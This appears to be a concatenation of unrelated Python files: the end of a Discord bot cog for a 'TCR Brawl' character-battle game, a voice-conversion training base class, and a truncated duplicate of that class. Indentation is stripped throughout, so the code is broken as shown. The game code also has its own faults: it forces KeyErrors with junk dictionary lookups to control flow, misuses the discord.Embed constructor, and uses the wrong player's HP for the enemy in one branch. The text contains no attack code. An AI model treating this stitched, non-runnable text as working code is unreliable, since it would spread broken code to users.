await inter.message.edit(embed=embed, components = [main_comps])
elif str(inter.clicked_button.emoji) == "🧑":
await inter.message.edit(embed=chars, components=[chars_comps])
@on_click.timeout
async def help_timeout():
buttons = ActionRow(
Button(style=ButtonStyle.green, label="Information", emoji="❕", disabled=True),
Button(style=ButtonStyle.blurple, label="FAQ", emoji="❔", disabled=True),
Button(style=ButtonStyle.secondary, label="Characters", emoji="🧑", disabled=True),
)
await msg.edit(components=[buttons])
@brawl.command()
async def faq(self, ctx):
faq = discord.Embed(title="Frequently Asked Questions", description="These aren't really frequently asked.", color=discord.Color.random())
faq.add_field(name="Why am I not a character here?", value="This has a few answers. You either aren't very familiar, we haven't got to you yet, or we can't think of a good moveset for you.")
faq.add_field(name="I'm in this game and don't want to be. How can I remove myself?", value="If you don't want to be in our game, please contact UnsoughtConch#9225.")
faq.add_field(name="How can I suggest a character?", value="Contact UnsoughtConch#9225.")
faq.add_field(name="I want to make improvements to the game/a character. Can I?", value="Of course! Make a pull request from [the Coding Bot repository](https://github.com/The-Coding-Academy/Coding-Bot-v4) and edit the JSON or code!")
faq.add_field(name="I'm a character in this game and want to suggest changes to myself. Can I do that?", value="Of course you can! Contact UnsoughtConch#9225.")
await ctx.send(embed=faq)
@brawl.command()
async def info(self, ctx):
menu_opts = []
char_embds = dict()
chars = discord.Embed(title="TCR ***BRAWL*** Characters", description="Select a character from the select menu to get started!")
for character in data:
menu_opts.append(SelectOption(character, character))
embed = discord.Embed(title="TCR ***BRAWL*** | " + character, color=discord.Color.random(), description=f"Character Class: {data[character]['class']}")
embed.add_field(name="Attack One:", value=f"NAME: {data[character]['atk_1']['name']}\nDAMAGE: {data[character]['atk_1']['dmg']}")
embed.add_field(name="Attack Two:", value=f"NAME: {data[character]['atk_2']['name']}\nDAMAGE: {data[character]['atk_2']['dmg']}")
type = data[character]['ability']['type']
if type == "heal":
embed.add_field(name="Ability:", value=f"NAME: {data[character]['ability']['name']}\nTYPE: Healing\nPARTIES HEALED: {data[character]['ability']['health_gain_amt']}"
f"\nHEALTH AMOUNT: {data[character]['ability']['health']}")
elif type == "stun":
embed.add_field(name="Ability:", value=f"NAME: {data[character]['ability']['name']}\nTYPE: Stun\nEXTRA TURNS: {data[character]['ability']['ext_turns']}")
elif type == "options":
embed.add_field(name="Ability:", value=f"NAME: {data[character]['ability']['name']}\nTYPE: Options\nOPTIONS: {', '.join([name for name in data[character]['ability']['options']])}")
elif type == "placebo":
embed.add_field(name="Ability:", value=f"NAME: {data[character]['ability']['name']}\nTYPE: Placebo\nEXTRA HEALTH: {data[character]['ability']['temp_xp']}\nTURNS KEPT: {data[character]['ability']['turns']}")
stri = '\n'
exc_list = []
if 'dmg_exc' in data[character]['atk_1']:
if 'name' in data[character]['atk_1']['dmg_exc']:
exc_list.append(f"CHARACTER: {data[character]['atk_1']['dmg_exc']['name']} | EXTRA DAMAGE: {data[character]['atk_1']['dmg_exc']['ext_dmg']}")
elif "class" in data[character]['atk_1']['dmg_exc']:
exc_list.append(f"CLASS: {data[character]['atk_1']['dmg_exc']['class']} | EXTRA DAMAGE: {data[character]['atk_1']['dmg_exc']['ext_dmg']}")
if 'dmg_exc' in data[character]['atk_2']:
if 'name' in data[character]['atk_2']['dmg_exc']:
exc_list.append(f"CHARACTER: {data[character]['atk_2']['dmg_exc']['name']} | EXTRA DAMAGE: {data[character]['atk_2']['dmg_exc']['ext_dmg']}")
elif "class" in data[character]['atk_2']['dmg_exc']:
exc_list.append(f"CLASS: {data[character]['atk_2']['dmg_exc']['class']} | EXTRA DAMAGE: {data[character]['atk_2']['dmg_exc']['ext_dmg']}")
if exc_list is not None:
stri = '\n'.join(exc_list)
embed.add_field(name="Damage Exceptions:", value=stri)
else:
embed.add_field(name="Damage Exceptions:", value="No exceptions.")
char_embds[character] = embed
menu = SelectMenu(
placeholder = "Select a character...",
custom_id="infoMenu",
options=menu_opts
)
if ctx.author.id in self.info_sesh:
msg = self.info_sesh[ctx.author.id]
pass
else:
msg = await ctx.send(embed=chars, components=[menu])
self.info_sesh[ctx.author.id] = msg
def check(m):
return m.author == ctx.author
try:
inter = await msg.wait_for_dropdown(check=check, timeout=30)
except:
del self.info_sesh[ctx.author.id]
return await msg.edit(components=[])
await inter.reply(type=6)
await msg.edit(embed=char_embds[[option.label for option in inter.select_menu.selected_options][0]])
await self.info(ctx)
@brawl.command(aliases=['fight', 'start'])
async def battle(self, ctx, user:discord.Member):
if user == ctx.author:
return await ctx.send(embed=discord.Embed(title="You cannot battle yourself.", color=discord.Color.red()))
embed = discord.Embed(title=f"Waiting for {user.display_name} to accept...", color=discord.Color.random())
buttons = ActionRow(
Button(style=ButtonStyle.green, label="Accept", emoji="✅"),
Button(style=ButtonStyle.red, label="Deny", emoji="❌")
)
base = await ctx.send(embed=embed, components=[buttons])
def check(m):
return m.author == user
try:
inter = await base.wait_for_button_click(check=check, timeout=30)
except:
await base.edit(embed=f"{user.display_name} failed to respond in time!", color=discord.Color.red())
await self.endgame(ctx)
await inter.reply(type=6)
embed = discord.Embed(title=f"{ctx.author.display_name}, choose your user!", color=discord.Color.random())
char_menu_opts = []
for character in data:
char = data[character]
desc = f"Class: {char['class']}\nAttack One: {char['atk_1']['name']}\nAttack Two: {char['atk_2']['name']}\nAbility: {char['ability']['name']}"
embed.add_field(name=character, value=desc)
char_menu_opts.append(SelectOption(character, character))
char_menu = SelectMenu(placeholder="Choose your user!", options=char_menu_opts)
await base.delete()
base = await ctx.send(embed=embed, components=[char_menu])
def check(m):
return m.author == ctx.author
try:
inter = await base.wait_for_dropdown(check=check, timeout=120)
except:
await base.edit(embed=discord.Embed(f"{ctx.author.display_name} failed to respond in time!", color=discord.Color.red()))
await self.endgame(ctx)
await inter.reply(type=6)
author_character = [option.label for option in inter.select_menu.selected_options][0]
embed.title = f"{user.display_name}, choose your user!"
await base.edit(embed=embed)
def check(m):
return m.author == user
try:
inter = await base.wait_for_dropdown(check=check, timeout=120)
except:
await ctx.send(embed=discord.Embed(f"{user.display_name} failed to respond in time!", color=discord.Color.red()))
await self.endgame(ctx)
await inter.reply(type=6)
await base.delete()
user_character = [option.label for option in inter.select_menu.selected_options][0]
self.battle_hp[ctx.author.id] = 100
self.battle_hp[user.id] = 100
# True means author turn, False means user turn
turne = True
await self.write_action(ctx.author.id, f"{author_character} ({ctx.author.display_name}) picks a fight with {user_character} ({user.display_name})")
while True:
if self.battle_hp[ctx.author.id] < 1 or self.battle_hp[user.id] < 1:
break
if turne is True:
turn = ctx.author
character = author_character
turn_hp = self.battle_hp[ctx.author.id]
turn_class = data[character]['class']
enemy = user
enemy_character = user_character
enemy_hp = self.battle_hp[user.id]
enemy_class = data[enemy_character]['class']
else:
turn = user
character = user_character
turn_hp = self.battle_hp[user.id]
turn_class = data[character]['class']
enemy = ctx.author
enemy_character = author_character
enemy_hp = self.battle_hp[user.id]
enemy_class = data[enemy_character]['class']
if turn.id in self.placebo:
if self.placebo[turn.id] == 0:
self.battle_hp[turn.id] = self.battle_hp[turn.id] - data[character]['ability']['temp_xp']
else:
self.placebo[turn.id] = self.placebo[turn.id] - 1
embed = discord.Embed(title=f"{turn.display_name}'s Turn")
if turn_hp > 75:
embed.color = discord.Color.green()
elif turn_hp > 25:
embed.color = discord.Color.gold()
elif turn_hp <= 25:
embed.color = discord.Color.red()
embed.add_field(name="Character:", value=character)
embed.add_field(name="HP:", value=turn_hp)
embed.add_field(name="** **", value="** **")
embed.add_field(name=data[character]['atk_1']['name'], value="ATTACK: " + data[character]['atk_1']['desc'])
embed.add_field(name=data[character]['atk_2']['name'], value="ATTACK: " + data[character]['atk_2']['desc'])
embed.add_field(name=data[character]['ability']['name'], value="ABILITY: " + data[character]['ability']['desc'])
embed.set_thumbnail(url=data[character]['pfp'])
options=[
SelectOption(data[character]['atk_1']['name'], "atk_1"),
SelectOption(data[character]['atk_2']['name'], "atk_2"),
SelectOption(data[character]['ability']['name'], "ability")
]
if turn.id in self.cooldowns:
flag = False
if 'atk_1' in self.cooldowns[turn.id]['moves']:
del self.cooldowns[turn.id]['moves']['atk_1']
del options[0]
flag = True
if 'ability' in self.cooldowns[turn.id]['moves']:
if turn.id in self.ext_turns:
pass
else:
if self.cooldowns[turn.id]['moves']['ability'] == 1:
del self.cooldowns[turn.id]['moves']['ability']
else:
self.cooldowns[turn.id]['moves']['ability'] = self.cooldowns[turn.id]['moves']['ability'] - 1
if flag is True:
del options[1]
else:
del options[2]
menu = SelectMenu(
placeholder="Select a move...",
options=options
)
msg1 = await ctx.send(embed=embed, components=[menu])
def check(m):
return m.author == turn
try:
inter = await msg1.wait_for_dropdown(check=check, timeout=120)
except:
await ctx.send(embed=discord.Embed(title=f"{turn.display_name} failed to respond on time, making {enemy.display_name} the winner!", color=discord.Color.red()))
await self.endgame(ctx, user)
return
await inter.reply(type=6)
move = [option.value for option in inter.select_menu.selected_options][0]
if move == "ability":
if turn.id in self.cooldowns:
self.cooldowns[turn.id]['moves']['ability'] = 2
else:
self.cooldowns[turn.id] = {'moves': {'ability': 2}}
if data[character][move]['type'] == 'heal':
self.battle_hp[turn.id] = self.battle_hp[turn.id] + data[character][move]['health']
if data[character][move]['health_gain_amt'] == 2:
self.battle_hp[enemy.id] = self.battle_hp[enemy.id] + data[character][move]['health']
phrase = f"{turn.display_name} healths both parties with {data[character][move]['name']} and gains {data[character][move]['health']} health!"
else:
phrase = f"{turn.display_name} healths themself with {data[character][move]['name']} and gains {data[character][move]['health']} health!"
elif data[character][move]['type'] == 'stun':
self.ext_turns[turn.id] = data[character][move]['ext_turns']
phrase = f"{turn.display_name} stuns {enemy.display_name} with {data[character][move]['name']} and gains {self.ext_turns[turn.id]} extra turns!"
elif data[character][move]['type'] == 'options':
buttons = ActionRow(
Button(style=ButtonStyle.green, label="Chill", emoji="😃"),
Button(style=ButtonStyle.red, label="Angry", emoji="😡")
)
msg2 = await ctx.send(embed=discord.Embed(title=f"{turn.display_name}, what option would you like to invoke?"), components=[buttons])
def check(m):
return m.author == turn
try:
inter = await msg2.wait_for_button_click(check=check, timeout=60)
except:
await self.endgame(ctx, user)
return await ctx.send(embed=discord.Embed(title=f"{turn.display_name} didn't choose in time, making {enemy.display_name} the winner!", color=discord.Color.red()))
await inter.reply(type=6)
option = inter.clicked_button.label
if data[character][move]['options'][option]['ext_dmg'] == 0:
try:
del self.options[turn.id]
except:
pass
self.options[turn.id] = data[character][move]['options'][option]['ext_dmg']
phrase = f"{turn.display_name} chooses {option} with {data[character][move]['name']} and gains {data[character][move]['options'][option]['ext_dmg']} extra power!"
await msg2.delete()
elif data[character][move]['type'] == "placebo":
self.battle_hp[turn.id] = self.battle_hp[turn.id] + data[character][move]['temp_xp']
self.placebo[turn.id] = data[character][move]['turns']
phrase = f"{turn.display_name} invokes a placebo with {data[character][move]['name']} that gives them {data[character][move]['temp_xp']} more HP for {data[character][move]['turns']} turns!"
else:
try:
dmg_class = data[character][move]['dmg_exc']['class']
if dmg_class == enemy_class:
ext_dmg = data[character][move]['dmg_exc']['ext_dmg']
dmg = ext_dmg + data[character][move]['dmg']
else:
dmg = data["wefrefwfwef"]
except KeyError:
try:
dmg_char = data[character][move]['dmg_exc']['name']
if dmg_char == enemy_character:
dmg = data[character][move]['dmg_exc']['ext_dmg'] + data[character][move]['dmg']
except KeyError:
dmg = data[character][move]['dmg']
if move == 'atk_1':
if turn.id in self.cooldowns:
self.cooldowns[turn.id]['moves']['atk_1'] = 0
else:
self.cooldowns[turn.id] = {'moves': {'atk_1': 0}}
if turn.id in self.options:
ext_dmg = self.options[turn.id]
dmg = ext_dmg + dmg
del self.options[turn.id]
phrase = f"{character} deals {dmg} damage to {enemy_character} with {data[character][move]['name']}"
if turne is True:
self.battle_hp[user.id] = self.battle_hp[user.id] - dmg
else:
self.battle_hp[ctx.author.id] = self.battle_hp[ctx.author.id] - dmg
await msg1.delete()
await self.write_action(ctx.author.id, phrase)
phrsmsg = await ctx.send(phrase)
try:
turns = self.ext_turns[turn.id]
if turns == 0:
del self.ext_turns[turn.id]
e = self.battle_hp[2]
self.ext_turns[turn.id] = self.ext_turns[turn.id] - 1
turne = True if turn == ctx.author else False
except:
turne = True if turn == user else False
await asyncio.sleep(5)
await phrsmsg.delete()
if self.battle_hp[ctx.author.id] < 1:
embed = discord.Embed(title=user_character + ": " + data[user_character]['catchphrase'] if user_character != 'BobDotCom' else random.choice(data[user_character]['catchphrase']),
description=f"{user_character} won!")
embed.set_footer(text=f"Remaining HP: {turn_hp}")
await ctx.send(embed=embed)
await self.endgame(ctx, user)
else:
embed = discord.Embed(title=author_character + ": " + data[author_character]['catchphrase'] if author_character != 'BobDotCom' else random.choice(data[author_character]['catchphrase']),
description=f"{author_character} won!")
embed.set_footer(text=f"Remaining HP: {turn_hp}")
await ctx.send(embed=embed)
await self.write_action(ctx.author.id, f"{ctx.author.display_name} ({author_character}) wins the battle with {turn_hp} HP remaining.")
await self.endgame(ctx, user)
def setup(client):
client.add_cog(Brawl(client))
|
#! /usr/bin/env python
# -*- coding: utf-8 -*-
# vim:fenc=utf-8
#
# Copyright (c) 2020 K. KOBAYASHI <root.4mac@gmail.com>
#
# Distributed under terms of the MIT license.
"""
BaseTrainer class
"""
import logging
import random
from abc import abstractmethod
from pathlib import Path
import numpy as np
import torch
from crank.net.trainer.dataset import convert_f0, create_one_hot
from crank.utils import feat2hdf5, mlfb2wavf, to_device, to_numpy, world2wav
from joblib import Parallel, delayed
from tqdm import tqdm
def TrainerWrapper(trainer_type, **ka):
from crank.net.trainer import (
CycleGANTrainer,
LSGANTrainer,
StarGANTrainer,
VQVAETrainer,
)
if trainer_type == "vqvae":
trainer = VQVAETrainer(**ka)
elif trainer_type == "lsgan":
trainer = LSGANTrainer(**ka)
elif trainer_type == "cyclegan":
trainer = CycleGANTrainer(**ka)
elif trainer_type == "stargan":
trainer = StarGANTrainer(**ka)
else:
raise NotImplementedError(
"conf['trainer_type']: {} is not supported.".format(trainer_type)
)
return trainer
class BaseTrainer(object):
def __init__(
self,
model,
optimizer,
criterion,
dataloader,
writer,
expdir,
conf,
feat_conf,
scheduler=None,
scaler=None,
resume=0,
device="cuda",
n_jobs=-1,
):
self.model = model
self.optimizer = optimizer
self.criterion = criterion
self.dataloader = dataloader
self.writer = writer
self.expdir = Path(expdir)
self.conf = conf
self.feat_conf = feat_conf
self.scheduler = scheduler
self.scaler = scaler
self.device = device
self.n_jobs = n_jobs
self.spkrs = dataloader["spkrs"]
self.n_spkrs = len(self.spkrs)
self.n_cv_spkrs = 4 if self.n_spkrs > 4 else self.n_spkrs
self.n_dev_samples = 5
self.resume_steps = resume
self.steps = resume
if not isinstance(self.scheduler, dict):
self.scheduler.step(self.steps)
else:
for k in self.scheduler:
self.scheduler[k].step(self.steps)
self.finish_train = False
self.tqdm = tqdm(initial=self.steps, total=self.conf["n_steps"], desc="train")
@abstractmethod
def train(self):
loss_values = None
return loss_values
@abstractmethod
def dev(self, batch):
loss_values = None
return loss_values
@abstractmethod
def eval(self, batch):
pass
@abstractmethod
def reconstruction(self, batch):
pass
@abstractmethod
def check_custom_start(self):
pass
def run(self, flag="train", tdir=None):
self.flag = flag
if flag == "train":
while True:
self._tr_step()
if self.finish_train:
break
self.tqdm.close()
self.writer["train"].close()
self.writer["dev"].close()
logging.info("Finish training")
else:
self._run_eval(flag, tdir)
def save_model(self):
checkpoint = self.expdir / "checkpoint_{}steps.pkl".format(self.steps)
state_dict = {
"steps": self.steps,
"model": {"G": self.model["G"].state_dict()},
}
for m in ["SPKRADV", "D", "C"]:
if m in self.model.keys():
state_dict["model"].update({m: self.model[m].state_dict()})
torch.save(state_dict, checkpoint)
def _run_eval(self, flag="eval", tdir=False):
self.tqdm.close()
if flag == "eval":
logging.info("Run evaluation")
self._eval_steps()
logging.info("Finish evalation")
if flag == "reconstruction":
logging.info("Run reconstruction")
self._reconstruction_steps(tdir)
logging.info("Finish reconstruction")
def _tr_step(self):
for batch in self.dataloader["train"]:
batch = to_device(batch, self.device)
loss_values = self.train(batch, phase="train")
if self.steps % self.conf["n_steps_print_loss"] == 0:
self._print_loss_values(loss_values, phase="train")
self._dev_step()
# check step-by-step
self._check_save_model()
self._step_update()
self._check_finish()
# check custum func in each child
self.check_custom_start()
def _dev_step(self):
if (
self.steps % self.conf["dev_steps"] == 0
and self.steps > self.conf["dev_steps"] - 1
and self.steps != self.resume_steps
):
dev_loss_values = self._get_loss_dict()
for dev_idx, batch in enumerate(self.dataloader["dev"]):
batch = to_device(batch, self.device)
dev_loss_values = self.dev(batch)
if dev_idx > 0:
break
self._print_loss_values(dev_loss_values, phase="dev")
def _eval_steps(self):
eval_tqdm = tqdm(initial=0, total=len(self.dataloader["eval"]), desc="eval")
for batch in self.dataloader["eval"]:
batch = to_device(batch, self.device)
self.eval(batch)
eval_tqdm.update(1)
eval_tqdm.close()
def _reconstruction_steps(self, tdir=False):
for dkey in ["train", "dev"]:
recon_tqdm = tqdm(
initial=0,
total=len(self.dataloader[dkey]),
desc="reconstruction ({})".format(dkey),
)
for batch in self.dataloader[dkey]:
batch = to_device(batch, self.device)
self.reconstruction(batch, tdir="reconstruction")
recon_tqdm.update(1)
recon_tqdm.close()
def _get_loss_dict(self):
loss_dict = {"objective": 0.0, "G": 0.0, "D": 0.0, "C": 0.0, "SPKRADV": 0.0}
return loss_dict
def _parse_loss(self, loss):
loss_values = self._get_loss_dict()
for k in loss.keys():
if k not in loss_values.keys():
loss_values[k] = 0.0
if isinstance(loss[k], torch.Tensor):
loss_values[k] += loss[k].item()
return loss_values
def _print_loss_values(self, loss_values, phase="train"):
print()
logging.info("{} iterations: {}".format(phase, self.steps))
for k, v in sorted(loss_values.items()):
if v != 0.0:
logging.info("{}: {}".format(k, v))
def _flush_writer(self, loss, phase):
if self.steps % self.conf["n_steps_print_loss"] == 0:
for k in loss.keys():
if isinstance(loss[k], torch.Tensor):
self.writer[phase].add_scalar(
"loss/{}".format(k), loss[k].item(), self.steps
)
self.writer[phase].flush()
def _check_save_model(self):
if (self.resume_steps != self.steps) and (
self.steps % self.conf["n_steps_save_model"] == 0
):
self.save_model()
def _step_update(self):
self.steps += 1
self.tqdm.update(1)
if self.scheduler is not None:
if not isinstance(self.scheduler, dict):
self.scheduler.step()
else:
for k in self.scheduler:
self.scheduler[k].step(self.steps)
def _check_finish(self):
if self.steps > self.conf["n_steps"]:
self.finish_train = True
def _get_enc_h(self, batch, use_cvfeats=False, cv_spkr_name=None):
if self.conf["encoder_f0"]:
f0 = self._get_f0_condition(batch, cv_spkr_name, use_cvfeats)
return f0
else:
return None
def _get_dec_h(self, batch, use_cvfeats=False, cv_spkr_name=None):
h, h_onehot = self._get_spkr_conditions(batch, cv_spkr_name, use_cvfeats)
if self.conf["decoder_f0"]:
f0 = self._get_f0_condition(batch, cv_spkr_name, use_cvfeats)
else:
f0 = None
if not self.conf["use_spkr_embedding"]:
if f0 is not None:
return torch.cat([f0, h_onehot], dim=-1), None
else:
return h_onehot, None
else:
if f0 is not None:
return f0, h
else:
return None, h
def _get_f0_condition(self, batch, cv_spkr_name, use_cvfeats=False):
if cv_spkr_name is not None:
# use specified cv speaker
lcf0 = self._get_cvf0(batch, cv_spkr_name)
else:
if use_cvfeats:
# use randomly selected cv speaker by dataset
lcf0 = batch["cv_lcf0"]
else:
# use org speaker
lcf0 = batch["lcf0"]
f0 = torch.cat([lcf0, batch["uv"]], axis=-1)
return f0
def _get_spkr_conditions(self, batch, cv_spkr_name, use_cvfeats=False):
if cv_spkr_name is not None:
# use specified cv speaker
B, T, _ = batch["in_feats"].size()
spkr_num = self.spkrs[cv_spkr_name]
h_onehot_np = create_one_hot(T, self.n_spkrs, spkr_num, B=B)
h_onehot = torch.tensor(h_onehot_np).to(self.device)
h = (torch.ones((B, T)).long() * self.spkrs[cv_spkr_name]).to(self.device)
else:
if use_cvfeats:
# use randomly selected cv speaker by dataset
h = batch["cv_h"].clone()
h_onehot = batch["cv_h_onehot"]
else:
# use org speaker
h_onehot = batch["org_h_onehot"]
h = batch["org_h"].clone()
h[:, :] = h[:, 0:1] # remove ignore_index (i.e., -100)
return h, h_onehot
def _get_cvf0(self, batch, spkr_name):
cv_lcf0s = []
for n in range(batch["in_feats"].size(0)):
org_lcf0 = self.scaler["lcf0"].inverse_transform(to_numpy(batch["lcf0"][n]))
cv_lcf0 = convert_f0(
self.scaler, org_lcf0, batch["org_spkr_name"][n], spkr_name
)
normed_cv_lcf0 = self.scaler["lcf0"].transform(cv_lcf0)
cv_lcf0s.append(torch.tensor(normed_cv_lcf0))
return torch.stack(cv_lcf0s, dim=0).float().to(self.device)
def _generate_cvwav(
self,
batch,
outputs,
cv_spkr_name=None,
tdir="dev_wav",
save_hdf5=True,
save_decoded=True,
n_samples=1,
):
tdir = self.expdir / tdir / str(self.steps)
feats = self._store_features(batch, outputs, cv_spkr_name, tdir)
if not (n_samples == -1 or n_samples > len(feats.keys())):
feats = dict((k, feats[k]) for k in random.sample(feats.keys(), n_samples))
for k in feats.keys():
Path(k).parent.mkdir(parents=True, exist_ok=True)
if save_hdf5:
self._save_decoded_to_hdf5(feats)
if save_decoded:
if self.conf["output_feat_type"] == "mcep":
self._save_decoded_world(feats)
else:
self._save_decoded_mlfb(feats)
def _store_features(self, batch, outputs, cv_spkr_name, tdir):
def inv_trans(k, feat):
if k not in self.conf["ignore_scaler"]:
return self.scaler[k].inverse_transform(feat)
else:
return feat
feats = {}
feat_type = self.conf["output_feat_type"]
for n in range(outputs["decoded"].size(0)):
org_spkr_name = batch["org_spkr_name"][n]
cv_name = org_spkr_name if cv_spkr_name is None else cv_spkr_name
wavf = tdir / f"{batch["flbl"][n]}_org-{org_spkr_name}_cv-{cv_name}.wav"
# feat
feats[wavf] = {}
flen = batch["flen"][n]
feat = to_numpy(outputs["decoded"][n][:flen])
if feat_type == "mcep":
feats[wavf]["cap"] = to_numpy(batch["cap"][n][:flen])
if not self.conf["use_mcep_0th"]:
org_mcep_0th = to_numpy(batch["mcep_0th"][n][:flen])
org_mcep = to_numpy(batch["in_feats"][n][:flen])
feat = np.ascontiguousarray(np.hstack([org_mcep_0th, feat]))
rmcep = np.ascontiguousarray(np.hstack([org_mcep_0th, org_mcep]))
feats[wavf]["rmcep"] = inv_trans(feat_type, rmcep)
else:
feats[wavf]["rmcep"] = None
feats[wavf]["feats"] = inv_trans(feat_type, feat)
# f0
org_cf0 = inv_trans("lcf0", to_numpy(batch["lcf0"][n][:flen]))
cv_cf0 = convert_f0(self.scaler, org_cf0, org_spkr_name, cv_name)
feats[wavf]["lcf0"] = cv_cf0
feats[wavf]["uv"] = to_numpy(batch["uv"][n][:flen])
feats[wavf]["f0"] = np.exp(cv_cf0) * feats[wavf]["uv"]
# save normed one as well
feats[wavf]["normed_lcf0"] = self.scaler["lcf0"].transform(cv_cf0)
feats[wavf]["normed_feat"] = feat
return feats
def _save_decoded_to_hdf5(self, feats):
type_features = ["feats", "normed_feat", "f0", "lcf0", "normed_lcf0", "uv"]
if self.conf["output_feat_type"] == "mcep":
type_features += ["cap"]
for k in type_features:
Parallel(n_jobs=self.n_jobs)(
[
delayed(feat2hdf5)(feat[k], path, ext=k)
for path, feat in feats.items()
]
)
def _save_decoded_mlfb(self, feats):
Parallel(n_jobs=self.n_jobs)(
[
delayed(mlfb2wavf)(
feats[wavf]["feats"],
wavf,
fs=self.feat_conf["fs"],
n_mels=self.feat_conf["mlfb_dim"],
fftl=self.feat_conf["fftl"],
win_length=self.feat_conf["win_length"],
hop_size=self.feat_conf["hop_size"],
fmin=self.feat_conf["fmin"],
fmax=self.feat_conf["fmax"],
plot=True,
)
for wavf in feats.keys()
]
)
def _save_decoded_world(self, feats):
Parallel(n_jobs=self.n_jobs)(
[
delayed(world2wav)(
feats[k]["f0"][:, 0].astype(np.float64),
feats[k]["feats"].astype(np.float64),
feats[k]["cap"].astype(np.float64),
rmcep=feats[k]["rmcep"].astype(np.float64),
wavf=k,
fs=self.conf["feature"]["fs"],
fftl=self.conf["feature"]["fftl"],
shiftms=self.conf["feature"]["shiftms"],
alpha=self.conf["feature"]["mcep_alpha"],
)
for k in feats.keys()
]
)
| #! /usr/bin/env python
# -*- coding: utf-8 -*-
# vim:fenc=utf-8
#
# Copyright (c) 2020 K. KOBAYASHI <root.4mac@gmail.com>
#
# Distributed under terms of the MIT license.
"""
BaseTrainer class
"""
import logging
import random
from abc import abstractmethod
from pathlib import Path
import numpy as np
import torch
from crank.net.trainer.dataset import convert_f0, create_one_hot
from crank.utils import feat2hdf5, mlfb2wavf, to_device, to_numpy, world2wav
from joblib import Parallel, delayed
from tqdm import tqdm
def TrainerWrapper(trainer_type, **ka):
from crank.net.trainer import (
CycleGANTrainer,
LSGANTrainer,
StarGANTrainer,
VQVAETrainer,
)
if trainer_type == "vqvae":
trainer = VQVAETrainer(**ka)
elif trainer_type == "lsgan":
trainer = LSGANTrainer(**ka)
elif trainer_type == "cyclegan":
trainer = CycleGANTrainer(**ka)
elif trainer_type == "stargan":
trainer = StarGANTrainer(**ka)
else:
raise NotImplementedError(
"conf['trainer_type']: {} is not supported.".format(trainer_type)
)
return trainer
class BaseTrainer(object):
def __init__(
self,
model,
optimizer,
criterion,
dataloader,
writer,
expdir,
conf,
feat_conf,
scheduler=None,
scaler=None,
resume=0,
device="cuda",
n_jobs=-1,
):
self.model = model
self.optimizer = optimizer
self.criterion = criterion
self.dataloader = dataloader
self.writer = writer
self.expdir = Path(expdir)
self.conf = conf
self.feat_conf = feat_conf
self.scheduler = scheduler
self.scaler = scaler
self.device = device
self.n_jobs = n_jobs
self.spkrs = dataloader["spkrs"]
self.n_spkrs = len(self.spkrs)
self.n_cv_spkrs = 4 if self.n_spkrs > 4 else self.n_spkrs
self.n_dev_samples = 5
self.resume_steps = resume
self.steps = resume
if not isinstance(self.scheduler, dict):
self.scheduler.step(self.steps)
else:
for k in self.scheduler:
self.scheduler[k].step(self.steps)
self.finish_train = False
self.tqdm = tqdm(initial=self.steps, total=self.conf["n_steps"], desc="train")
@abstractmethod
def train(self):
loss_values = None
return loss_values
@abstractmethod
def dev(self, batch):
loss_values = None
return loss_values
@abstractmethod
def eval(self, batch):
pass
@abstractmethod
def reconstruction(self, batch):
pass
@abstractmethod
def check_custom_start(self):
pass
def run(self, flag="train", tdir=None):
self.flag = flag
if flag == "train":
while True:
self._tr_step()
if self.finish_train:
break
self.tqdm.close()
self.writer["train"].close()
self.writer["dev"].close()
logging.info("Finish training")
else:
self._run_eval(flag, tdir)
def save_model(self):
checkpoint = self.expdir / "checkpoint_{}steps.pkl".format(self.steps)
state_dict = {
"steps": self.steps,
"model": {"G": self.model["G"].state_dict()},
}
for m in ["SPKRADV", "D", "C"]:
if m in self.model.keys():
state_dict["model"].update({m: self.model[m].state_dict()})
torch.save(state_dict, checkpoint)
def _run_eval(self, flag="eval", tdir=False):
self.tqdm.close()
if flag == "eval":
logging.info("Run evaluation")
self._eval_steps()
logging.info("Finish evalation")
if flag == "reconstruction":
logging.info("Run reconstruction")
self._reconstruction_steps(tdir)
logging.info("Finish reconstruction")
def _tr_step(self):
for batch in self.dataloader["train"]:
batch = to_device(batch, self.device)
loss_values = self.train(batch, phase="train")
if self.steps % self.conf["n_steps_print_loss"] == 0:
self._print_loss_values(loss_values, phase="train")
self._dev_step()
# check step-by-step
self._check_save_model()
self._step_update()
self._check_finish()
# check custum func in each child
self.check_custom_start()
def _dev_step(self):
if (
self.steps % self.conf["dev_steps"] == 0
and self.steps > self.conf["dev_steps"] - 1
and self.steps != self.resume_steps
):
dev_loss_values = self._get_loss_dict()
for dev_idx, batch in enumerate(self.dataloader["dev"]):
batch = to_device(batch, self.device)
dev_loss_values = self.dev(batch)
if dev_idx > 0:
break
self._print_loss_values(dev_loss_values, phase="dev")
def _eval_steps(self):
eval_tqdm = tqdm(initial=0, total=len(self.dataloader["eval"]), desc="eval")
for batch in self.dataloader["eval"]:
batch = to_device(batch, self.device)
self.eval(batch)
eval_tqdm.update(1)
eval_tqdm.close()
def _reconstruction_steps(self, tdir=False):
for dkey in ["train", "dev"]:
recon_tqdm = tqdm(
initial=0,
total=len(self.dataloader[dkey]),
desc="reconstruction ({})".format(dkey),
)
for batch in self.dataloader[dkey]:
batch = to_device(batch, self.device)
self.reconstruction(batch, tdir="reconstruction")
recon_tqdm.update(1)
recon_tqdm.close()
def _get_loss_dict(self):
loss_dict = {"objective": 0.0, "G": 0.0, "D": 0.0, "C": 0.0, "SPKRADV": 0.0}
return loss_dict
def _parse_loss(self, loss):
loss_values = self._get_loss_dict()
for k in loss.keys():
if k not in loss_values.keys():
loss_values[k] = 0.0
if isinstance(loss[k], torch.Tensor):
loss_values[k] += loss[k].item()
return loss_values
def _print_loss_values(self, loss_values, phase="train"):
print()
logging.info("{} iterations: {}".format(phase, self.steps))
for k, v in sorted(loss_values.items()):
if v != 0.0:
logging.info("{}: {}".format(k, v))
def _flush_writer(self, loss, phase):
if self.steps % self.conf["n_steps_print_loss"] == 0:
for k in loss.keys():
if isinstance(loss[k], torch.Tensor):
self.writer[phase].add_scalar(
"loss/{}".format(k), loss[k].item(), self.steps
)
self.writer[phase].flush()
def _check_save_model(self):
if (self.resume_steps != self.steps) and (
self.steps % self.conf["n_steps_save_model"] == 0
):
self.save_model()
def _step_update(self):
self.steps += 1
self.tqdm.update(1)
if self.scheduler is not None:
if not isinstance(self.scheduler, dict):
self.scheduler.step()
else:
for k in self.scheduler:
self.scheduler[k].step(self.steps)
def _check_finish(self):
if self.steps > self.conf["n_steps"]:
self.finish_train = True
def _get_enc_h(self, batch, use_cvfeats=False, cv_spkr_name=None):
if self.conf["encoder_f0"]:
